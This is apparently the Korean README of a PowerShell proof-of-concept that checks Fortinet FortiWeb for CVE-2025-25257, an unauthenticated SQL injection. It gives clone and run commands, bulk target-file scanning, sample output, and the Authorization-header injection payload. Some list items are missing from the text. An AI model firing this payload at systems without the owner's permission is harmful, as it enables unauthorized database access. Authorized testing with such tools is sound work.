
교육용 및/또는 승인된 침투 테스트를 위한 CVE-2025-25257 PoC
이 PowerShell 스크립트는 공인된 침투 테스트 목적으로만 설계되었습니다. /api/fabric/device/status 엔드포인트의 인증되지 않은 SQL 인젝션 취약점인 Fortinet FortiWeb CVE-2025-25257을 테스트합니다.
이 스크립트는 다음과 같습니다:
중요 고지 사항:
이 도구는 침투 테스트 또는 취약점 평가 시나리오에서 윤리적이고 공인된 사용을 위해서만 사용됩니다. 무단 사용은 컴퓨터 사기 및 남용법(CFAA) 또는 해당 국가의 유사한 규정과 같은 법률을 위반할 수 있습니다. 이 스크립트를 실행하기 전에 대상 소유자의 명시적 허가를 받았는지 확인하십시오. 작성자는 오용에 대해 어떠한 책임도 지지 않습니다.
Invoke-WebRequest를 사용합니다.git clone https://github.com/mr-r3b00t/CVE-2025-25257.git
cd CVE-2025-25257
스크립트는 script.ps1에 있습니다.
PowerShell에서 다음 옵션 중 하나로 스크립트를 실행합니다:
단일 IP 또는 DNS 이름을 지정하고 선택적으로 포트를 지정합니다(예: 192.168.1.1:443).
.\script.ps1 -Target "192.168.1.1:443"
또는 포트 없이(기본 포트 스캔):
.\script.ps1 -Target "example.com"
한 줄에 대상 하나씩 포함된 텍스트 파일을 제공합니다(예: targets.txt).
.\script.ps1 -InputFile "targets.txt"
targets.txt 콘텐츠 예시:
192.168.1.1:443
example.com
10.0.0.1
스크립트는 각 대상 및 포트에 대한 결과를 출력하며, 여기에는 다음이 포함됩니다:
샘플 출력:
Testing https://192.168.1.1:443/api/fabric/device/status for CVE-2025-25257
Endpoint accessible (HEAD 200 OK). Proceeding with GET request for vulnerability test.
GET Response Status: 200
Potential vulnerability detected (200 OK with payload). Check content for confirmation.
GET Response Content: {"devices": [...]}
Authorization 헤더(Bearer AAAAAA'or'1'='1)에서 SQL 인젝션 테스트를 사용합니다.기여는 언제나 환영합니다! 리포지토리를 포크하고 개선 사항, 버그 수정 또는 추가 기능이 포함된 풀 리퀘스트를 제출해 주세요.
이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.
질문이나 문제가 있으면 GitHub 이슈를 열어 주세요.